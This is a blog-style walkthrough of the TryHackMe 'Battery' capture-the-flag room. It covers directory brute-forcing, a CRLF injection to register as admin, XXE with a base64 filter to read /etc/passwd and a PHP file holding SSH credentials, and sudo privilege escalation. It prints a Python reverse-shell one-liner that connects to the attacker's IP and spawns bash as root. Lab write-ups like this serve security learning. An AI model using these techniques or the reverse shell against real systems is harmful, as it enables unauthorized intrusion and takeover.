Battery is a medium level room in Tryhackme. The initial foothold is obtained by getting the ssh credentials
from a php page after using the php base64 bypass
. But the root flag is fairly easy to get. Unlike usual, the final objective is to get two user flags and the root flag.
Author | cr3t3ht3 |
Description | CTF designed by CTF lover for CTF lovers |
Deploy the VM and let’s Hack the machine.
Let’s start enumerating with the usual nmap scan.
The nmap results show that the ports 22/ssh
and 80/http
port/service is open. Visiting the http
service, I was greeted with this page.
Use gobuster
to bruteforce the hidden directories.
gobuster dir -u http://machine-ip/ -w /usr/share/dirb/wordlists/common.txt -x php,html,js,txt
Firstly, I checked the most interesting page admin.php
and found the login page. I tried some common credentials and sql injection payloads, but had no luck with it. So, I created a new account in the admin.php
page and found some tabs in the top of the page.
I was able to take a look at every tab except the My Account
and the command
tabs which was locked out only for admins to use.
After checking the other pages from the gobuster
results, I was left with /report
. After moving into the /report
page it prompted for download.
I checked the file type and found that it is an ELF
I used strings
to get the contents of the file. Alternatively, you can also use radare2
or Ghidra
The first thing that caught my eye after using strings
is the username admin@bank.a
. I tried taking a deeper look into the ELF
file but it was a wasted effort.
Registering Admin account
Then I tried creating a new account using the username admin@bank.a
but an alert box popped up.
This is the part where it gets a little interesting. I fired up Burpsuite
and played around with the parameters. Finally, I used CRLF vunlnerability
to register the account.
For those who don’t know about CRLF vulnerability
here is the definition: A Carriage Return Line Feed
Injection vulnerability occurs when an application does not sanitize user input correctly and allows for the insertion of carriage returns and line feeds.
To do this, capture the request using Burp Proxy
and hit Enter
(a new line) after the username value.
And boom!! Now we can login as admin.
Exploiting XXE
Firstly, I checked the tabs that are only allowed for admins i.e the My account
tab and found that it uses XML
to reflect the account number
I grabbed the payload for the XXE - XML External Entity
vulnerability payload from PayloadsAllthethings
and tested for it,…which worked perfectly.
Then, I tried to pull out the /etc/passwd
file using XXE
but it didn’t return anything. So, I tried it with the php base64 filter bypass
Decoding the base64 string we can get the two usernames from the /etc/passwd file. You can use Cyberchef
or echo "base64-contents" | base64 -d
Getting SSH password
Doing the same thing for the acc.php
and decoding it, we can get the password for the user cyber
Getting user flag 1
Log in using the credentials we just found into SSH
and you can get the user flag 1
in the home directory of the user cyber
Getting user flag 2
We can get the user flag 2
in the home directory of the user yash
Getting root
After doing some common priviledge escalation enumeration I found that the file /home/cyber/
can be run as root.
Taking a closer look at the file, it is owned by root
, so we don’t have enough permissions to edit it. But since it is in the home directory of the user cyber
we can create a new file with the same name and run it as root.
mv touch nano
And enter the reverse shell python3 payload in the file. Remeber to edit the ip
and the port
import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("your-vpn-ip",4444));os.dup2(s.fileno(),0) os.dup2(s.fileno(),1);os.dup2(s.fileno(),2) import pty pty.spawn("/bin/bash")'
Remeber to open a netcat listener in your local machine. To get the reverse shell run…
sudo /usr/bin/python3 /home/cyber/
The root flag will be waiting for you in the /root
Stay tuned for more…
That’s it folks. Happy hacking!!!